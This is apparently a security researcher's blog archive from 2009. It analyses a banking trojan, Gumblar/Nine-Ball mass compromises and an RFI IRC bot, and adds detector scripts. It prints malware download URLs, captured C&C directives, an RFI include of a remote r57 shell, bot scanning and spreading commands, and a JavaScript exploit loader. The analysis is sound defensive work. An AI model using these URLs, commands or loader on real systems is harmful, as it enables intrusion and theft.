
One Click Hosting Spreads Banking Trojan

While this is not totally new, I only recently came across my first event involving a one click host serving malware. What is one click hosting? These are providers you have probably heard of before, such as RapidShare, Megaupload, yousendit and many more; Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free, or for a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host), hotlinkfiles.com, began serving up malware. The host runs AV on uploads, according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

hotlinkfiles.com /files/2607508_gs2zp/eudenoite1.scr
premium.hotlinkfiles.com /files/2619000_idqqh/fotosanexadas.scryh
hotlinkfiles.com /files/2637460_lnqnl/DSC_804.jpg.scr
premium.hotlinkfiles.com /files/2645684_c2awa/fotosanexadas.scr
hotlinkfiles.com /files/2645758_i45ka/DSC_805.jpg.scr

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or used an account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41; most vendors detect it as Banload, which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads, which are all executables [Threatexpert]; however, the detection rate on them is terrible, with most being detected by 0/41 vendors. [Virustotal]


So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.



Finding the Unknown - Detecting Emailed Malware Waves

In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.

Another method I’d like to highlight is looking for password-protected zip files. Like the transfer of executables, password-protected zips are perfectly legitimate. Let’s take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password-protected zips. You might think that a signature like this would generate a lot of events, and it does; however, it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”. A quick search leads us to this article over at abuse.ch.
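An added example (not the author's signature or code) of the check such a signature performs: bit 0 of the general-purpose flags in a ZIP local file header marks an encrypted entry, and because entry names in a password-protected archive are stored in clear, a detector can both flag the archive and see that it carries an executable. The sample archives are built inline; the "encrypted" one is constructed by setting the flag bit on a normal archive, which is all a header-based check looks at.

```python
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
FLAG_ENCRYPTED = 0x0001          # general-purpose flag bit 0: entry is encrypted
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def iter_local_headers(data):
    """Yield (name, flags) for every local file header in a ZIP byte stream.

    Only the fixed 30-byte header and the (always plaintext) file name are
    read; entry data is never decompressed or decrypted.
    """
    pos = data.find(LOCAL_HEADER_SIG)
    while pos >= 0 and pos + 30 <= len(data):
        # sig(4) version(2) flags(2) method(2) time(2) date(2) crc(4)
        # csize(4) usize(4) name_len(2) extra_len(2) | name | extra | data
        flags, _method, _t, _d, _crc, csize, _usize, nlen, xlen = struct.unpack_from(
            "<HHHHIIIHH", data, pos + 6)
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        yield name, flags
        pos = data.find(LOCAL_HEADER_SIG, pos + 30 + nlen + xlen + csize)


def password_protected_entries(data):
    """Names of entries whose header carries the encryption bit (what a network signature keys on)."""
    return [name for name, flags in iter_local_headers(data) if flags & FLAG_ENCRYPTED]


def triage(data):
    """Rank an archive: an encrypted entry with an executable name is the SPAM-run pattern."""
    encrypted = password_protected_entries(data)
    executables = [n for n in encrypted if n.lower().endswith(EXEC_EXTENSIONS)]
    if executables:
        return "high", executables
    if encrypted:
        return "review", encrypted
    return "clean", []


def build_sample_zip(name, encrypted):
    """Constructed sample: a one-entry archive. With encrypted=True the local header's
    encryption bit is set to mimic a password-protected entry; the entry data is left
    as-is, which is enough to exercise header-based detection."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, b"MZ" + b"\0" * 64)   # constructed stand-in for a payload
    data = bytearray(buf.getvalue())
    if encrypted:
        pos = data.find(LOCAL_HEADER_SIG)
        flags = struct.unpack_from("<H", data, pos + 6)[0] | FLAG_ENCRYPTED
        struct.pack_into("<H", data, pos + 6, flags)
    return bytes(data)


if __name__ == "__main__":
    for label, sample in (("spam run", build_sample_zip("photo.exe", True)),
                          ("ordinary", build_sample_zip("photo.exe", False))):
        print(label, triage(sample))
```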

The messages were sent from a number of IPs, including:


The two worst offenders are Brazil and Turkey with 5 IPs each.

ASN    IP               Prefix            Country  Description
18881  201.22.7.148     201.22.0.0/18     BR       Global Village Telecom
8167   201.15.77.229    201.15.64.0/18    BR       TELESC - Telecomunicacoes de Santa Catarina SA
27699  201.0.136.67     201.0.0.0/16      BR       TELECOMUNICACOES DE SAO PAULO S/A - TELESP
27699  189.78.200.43    189.78.0.0/16     BR       TELECOMUNICACOES DE SAO PAULO S/A - TELESP
7738   187.14.9.68      187.14.0.0/19     BR       Telecomunicacoes da Bahia S.A.

9121   88.227.199.86    88.227.128.0/17   TR       TTNET TTnet Autonomous System
9121   85.100.177.112   85.100.128.0/17   TR       TTNET TTnet Autonomous System
9121   78.176.8.64      78.176.0.0/17     TR       TTNET TTnet Autonomous System
9121   78.166.216.115   78.166.128.0/17   TR       TTNET TTnet Autonomous System
9121   78.161.81.160    78.161.0.0/17     TR       TTNET TTnet Autonomous System

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.


Webcast today

Just a quick reminder that the webcast for my paper “Mobile Device Forensics” will be taking place at 1pm EDT today. See my previous blog post for more information.


Nine-Ball = Gumblar Redux? - 40,000 websites compromised

My RSS reader alerted me today to another wave of mass website compromises from Websense. Hungry for more information, I decided to dig in and reveal the details that, as always, have been left out.

Summary

This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:

Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries

What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.

Details

Information on Websense’s site was sparse, but a quick Google search for the first part of the domain they referenced in their alert yielded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133, which is hosted by Eurohost out of Ukraine, an outfit I have run across many times before. I’ll probably post another article on these guys shortly.

inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA

This IP hosts many other domains associated with the attack:

sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw

When connecting to rnw.kz, a series of redirects takes place between the above noted domains. Cookies are created to track victims (probably so a victim is only infected once) and are passed on to the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not successful in analysing the attack, as it just pointed me to ask.com :(

After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].

A VM of mine was infected, and after loading Internet Explorer the malware lit up and did its thing. I’ve submitted a few files to VT, but to be honest I haven’t had too much time to investigate everything.

Virustotal 1

Virustotal 2

Binary Downloads, Ads and C&C communication

Interesting notes:

User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visible: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.

GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes
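A small decoder for the zc.php check-in and its response, added here as an example (mine, not the author's tooling or anything from the malware): it splits the query string into bot identifier, version and, on the second check-in, the size_name list of files the bot reports as fetched; splits the response into #U1: download directives, the %%-terminated ad templates and leaked lines such as the SQL above; and reconciles what the C&C ordered against what the bot confirmed. The sample strings are abridged from the captures above, and the field meanings (l = country, d = bot id, v = version, k = downloads) are inferred from them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Abridged copies of the two check-ins and the first response captured above;
# the ad template text is cut down to one short line each.
BEACON_1 = ("GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3"
            "&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1")
BEACON_2 = ("GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3"
            "&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1")
RESPONSE = """#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|----|<a href="http://www.best-med-shop.com">Buy ...</a>|----%%
#U=:FORUM ADVERTISING|----||[URL=http://www.best-med-shop.com]Canadian medicine ...[/url]||----%%
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
"""

DIRECTIVE_RE = re.compile(r"^#U(?P<tag>.):(?P<body>.*)$")
REQUEST_RE = re.compile(r"^GET (?P<target>\S+) HTTP/1\.[01]$")


def parse_beacon(request_line):
    """Decode a zc.php check-in. Field meanings (l=country, d=bot id, v=version,
    k=<bytes>_<file>,... for files already fetched) are inferred from the capture."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/zc.php"):
        return None
    q = {key: vals[0] for key, vals in parse_qs(url.query).items()}
    reported = []
    for item in q.get("k", "").split(","):
        if item:
            size, _, name = item.partition("_")
            reported.append((name, int(size)))
    return {"country": q.get("l"), "bot_id": q.get("d"),
            "version": q.get("v"), "reported": reported}


def parse_response(body):
    """Split a response into #U1: download URLs, other #U<tag>: templates (%%-terminated),
    and anything else, which in this capture is debug output leaked by the C&C script."""
    out = {"downloads": [], "templates": {}, "leaked": []}
    for line in body.splitlines():
        m = DIRECTIVE_RE.match(line)
        if not m:
            if line.strip():
                out["leaked"].append(line)
            continue
        tag, payload = m.group("tag"), m.group("body")
        if tag == "1":
            out["downloads"].append(payload)
        else:
            out["templates"][tag] = payload[:-2] if payload.endswith("%%") else payload
    return out


def unreported_downloads(response, beacon):
    """URLs the C&C ordered that the follow-up check-in did not confirm as fetched."""
    confirmed = {name for name, _ in beacon["reported"]}
    return [u for u in response["downloads"]
            if urlsplit(u).path.rsplit("/", 1)[-1] not in confirmed]


if __name__ == "__main__":
    first, second = parse_beacon(BEACON_1), parse_beacon(BEACON_2)
    orders = parse_response(RESPONSE)
    print("bot", first["bot_id"], "v" + first["version"], "ordered:", orders["downloads"])
    print("confirmed:", second["reported"], "missing:", unreported_downloads(orders, second))
    print("leaked:", orders["leaked"])
```

A network signature for this beacon can key on the fixed User-Agent "socks" together with the /zub/zc.php path, or on a response body beginning with "#U1:http".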

Other interesting network traffic

GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache

POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache

s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html

iogeelhchqhogmhgggdccnghdqdk

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html

Files & Reg Keys

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”

C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmp
C:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)

Other notable behavior

The malware tries to overwrite user32.dll, triggering Windows File Protection. My VM bluescreened a couple of times during analysis, which means victims are probably suffering the same problem. The malware also installs WinPcap and hides its presence by deleting various reg keys and the WinPcap uninstaller.


SANS Paper of the Quarter Webcast!

At long last SANS and I have agreed on a date and time for me to deliver the first ever Paper of the Quarter webcast. My paper Mobile Device Forensics was picked as the Q1 2009 winner while I was away traveling South America, so I am a little late to the race. It will be held on June 24th at 1PM EDT, more information can be found here. I’ll be giving a brief overview of the paper and talking about how I analyzed a cellular phone, smartphone and MP3 player to gather data to use in a forensic investigation.

For the CISSPs reading my blog, you can probably claim CPE credits for attending the webcast, so don’t miss out!

For more information on the SANS Paper of the Quarter initiative, visit giac.org


This blog is now a honeypot!

As I was perusing my logs today on a lazy Sunday afternoon, I found I was being attacked by more RFI bots than usual. To my surprise, I realized it is because of my previous post on controlling RFI bots. In my last post I included a dork that is frequently scanned for, and in doing so made my own blog a target! Now whenever a bot searches for the dork I mentioned, my blog will be returned as a possible target. The site is not vulnerable, of course, so I thought I would turn this to my/our advantage.

I’ve cobbled together a little script that will read my web logs and spit out all the attack attempts and some stats as well. The script may result in some false positives so please take that into consideration. The suspected attacks and stats will be updated once a day and if things go well I may seed some more dorks into the blog to generate more hits.
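An added example along the lines of the script described above (mine, not the author's): it reads Apache combined-format log lines, treats any query parameter whose value is a remote URL (the index.php?sayfa=http://…/r57.txt??? shape shown in the part 3 bot transcript) as a suspected RFI attempt, and tallies attacks and distinct attacking domains. The log lines are constructed using RFC 5737 test addresses and example.net/example.org hosts.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines (RFC 5737 test addresses, example.* hosts). The first three
# mimic bot requests; the fourth is a search-engine visitor, the fifth a normal page view.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jun/2009:14:02:11 -0400] "GET /index.php?sayfa=http://shell.example.net/data/r57.txt??? HTTP/1.1" 200 5121 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Jun/2009:14:02:12 -0400] "GET /EN/index.php?sayfa=http://shell.example.net/data/r57.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jun/2009:14:05:40 -0400] "GET /index.php?page=http%3A%2F%2Fevil.example.org%2Fid.txt%3F%3F HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [21/Jun/2009:14:06:02 -0400] "GET /2009/06/rfi-pt3/ HTTP/1.1" 200 18344 "http://www.google.com/search?q=index.php%3Fsayfa%3D" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Jun/2009:14:07:30 -0400] "GET /index.php?sayfa=about HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
]


def find_rfi(line):
    """Return details of the RFI attempt in one log line, or None.

    Heuristic: a query parameter whose value is a remote URL. Legitimate
    redirect-style parameters also match, which is the false-positive source
    mentioned above, so review the included hosts before acting on them.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        value = unquote(value)                      # also catches doubly encoded values
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        # Bots append "???" (sometimes a %00) so the vulnerable script's own suffix is
        # discarded when it builds the include path; strip that to recover the real URL.
        included = value.split("\x00")[0].rstrip("?")
        return {
            "source_ip": m.group("ip"),
            "time": m.group("time"),
            "param": name,
            "included_url": included,
            "host": urlsplit(included).hostname or "",
            "user_agent": m.group("ua"),
        }
    return None


def summarize(lines):
    """Stats in the spirit of the sidebar: attack count, distinct attacking domains, top offenders."""
    attempts = [hit for hit in map(find_rfi, lines) if hit]
    return {
        "suspected_attacks": len(attempts),
        "domains": len({a["host"] for a in attempts}),
        "top_hosts": Counter(a["host"] for a in attempts).most_common(5),
        "top_sources": Counter(a["source_ip"] for a in attempts).most_common(5),
    }


if __name__ == "__main__":
    for hit in filter(None, map(find_rfi, SAMPLE_LOG)):
        print(f"{hit['source_ip']:<14} {hit['param']}= {hit['included_url']}")
    print(summarize(SAMPLE_LOG))
```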

Hopefully this will be a good source of live data for anyone wanting to research RFI attacks, please keep in mind that most of the attacking domains are compromised web servers themselves.

The details are on the left sidebar under “RFI Attacks”.


Controlling an RFI bot - RFI pt3

Let’s delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

<bot> [*] RFI Scan started -> 75 sites/process
<bot> [+] Bug: index.php?sayfa=
<bot> [+] Dork: “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >YAHOO : 0 > “index.php?sayfa=”
<bot> [~] >ASK : 126 > “index.php?sayfa=”
<bot> [~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
<bot> [~] >UOL : 390 > “index.php?sayfa=”
<bot> [~] >MSN : 2997 > “index.php?sayfa=”
<bot> [~] >ALTAVISTA : 630 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >GOOGLE : 0 > “index.php?sayfa=”
<bot> [~] >MSN : 3057 > “index.php?sayfa=”
<bot> [~] >ASK : 363 > “index.php?sayfa=”
<bot> [~] >UOL : 225 > “index.php?sayfa=”
<bot> [~] >VIRGILIO : 0 > “index.php?sayfa=”
<bot> [~] >LYCOS : 1731 > “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [*] >EXPLOITABLES: 4561 “index.php?sayfa=”
<bot> [+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

<bot> (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
<bot> (uname -a) Windows NT HERA 5.0 build 2195
<bot> (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
<bot> [+] Trying to spread ..
<bot> [%] _/ Exploiting 100 / 4561

ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials, which are available in the script. Looking at the configuration sample below, user “andy” may issue administrative commands to the bot.

my @admins = ("andy");
my $killpwd = "adminpass"; # Password to kill the bot

Show bot commands

<andy> !help
<RFI[13]> [!] !response  > Test if the RFI Response is working
<RFI[13]> [*] !chid <new rfi-id>  > Change the RFI-Response
<RFI[13]> [*] !killme  > KILL The Bot
<RFI[13]> [!] !milw0rm rss  > Get the last Milw0rm bugs
<RFI[13]> [!] !new rfi bugs  > Get the last 10 RFI bugs
<RFI[13]> [!] !new lfi bugs  > Get the last 10 LFI bugs
<RFI[13]> [!] !new sql bugs  > Get the last 10 SQL Injection bugs
<RFI[13]> [!] !new rce bugs  > Get the last 10 RCE bugs
<RFI[13]> [!] !cari <bug> <dork> -p <sites/proc>  > Start the RFI Scanner
<RFI[13]> [!] !lfi <bug> <dork>  > Start the LFI Scanner
<RFI[13]> [!] !sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
<RFI[13]> [!] !rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner
<RFI[13]> [!] !mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc>  > Start the Mass Scan
<RFI[13]> [*] !cmd <bashline>  > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
<RFI[13]> [*] !sspread -s <RFI_Vuln_site>  > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
<RFI[13]> [*] !admin add/remove <nickname>  > To add/remove a nickname to/from the admin list
<RFI[13]> [*] /msg RFI[13] !Sec ON/OFF -p <pwd>  > To enable or disable Security Mode
<RFI[13]> [*] /msg RFI[13] !Spread ON/OFF -p <pwd>  > To enable or disable Spread Mode
<RFI[13]> [!] !info  > Get infos about the Bot

Gather information

<andy> !info
<RFI[13]> [i] Release : v6 -Private IrcBot
<RFI[13]> [i] Author  : Attacker Nickname
<RFI[13]> [i] Contact : attacker@some.com
<RFI[13]> [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
<RFI[13]> [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00
<RFI[13]> [i] Spread Mode: OFF
<RFI[13]> [i] Security Mode: OFF

Remove the bot (admin only)

<andy> !cmd rm myscan2.txt (optional step if you know the name of the bot file)
<andy> !killme
<RFI[13]> [!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = "attacker nickname";
$authmail = "attacker@some.com";


Exploits Employed by Gumblar

Gumblar compromises clients using 2 different exploits. The first is an Adobe Acrobat PDF exploit, CVE-2008-2992, and the second is an Adobe Flash exploit. Unfortunately I haven’t been able to figure out which Flash exploit is employed, as decoding Flash is not an expertise of mine.

Here is the Wepawet output of the exploit script employed on each of the hostile domains I mentioned in my previous post.

Virus Total results for the main exploit script
Virus Total results for the flash exploit
Virus Total results for the PDF exploit

Exploit code is hosted at:

[gumblarserver].cn:8080/
[gumblarserver].cn:8080/cache/flash.swf
[gumblarserver].cn:8080/cache/readme.pdf

The following is the portion of the script that loads the exploits. The pdfswf() function executes and loads two iframes which reference the exploits.

function pdfswf()
{
    PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
    for (i in PDF)
    {
        try
        {
            obj = new ActiveXObject(PDF[i]);
            if (obj)
            {
                document.write('<iframe src="cache/readme.pdf"></iframe>');
            }
        }
        catch (e) {}
    }
    try
    {
        obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
        if (obj)
        {
            document.write('<iframe src="cache/flash.swf"></iframe>');
        }
    }
    catch (e) {}
}
pdfswf();

On an interesting note, it appears that the location where the malware author may have compiled the Flash file is embedded in the Flash movie. This information was gathered using: swfdump -atpdu flash.swf.

-=> 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20  erGC:\Documents
-=> 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76  and Settings\dev
-=> 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51  \Desktop\exp;;HQ

C:\Documents and Settings\dev\Desktop\exp

More Gumblar domains are hosted on 70.85.142.250 Link

I haven’t checked all of them, but these are the domains that I suspect are involved.


My personal favorite would have to be giantbeaversdiet.cn which hosts the binary payload that starts the chain of infection as described in the previous post. (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8)

Who comes up with these domain names anyway??


Facebook Phish - bestspace.be

Let’s take a look at a Facebook phish I received recently. I received this message from a friend:

XXXXX sent you a message.

Subject: Hi

“Look at bestspace.be”

I’ve included a screenshot of the site below; note that it looks like the Facebook login page, complete with poor spelling of “helps”.


The form sends your stolen credentials back to bestspace.be for processing:

<form method="POST" action="/?login_attempt=1">

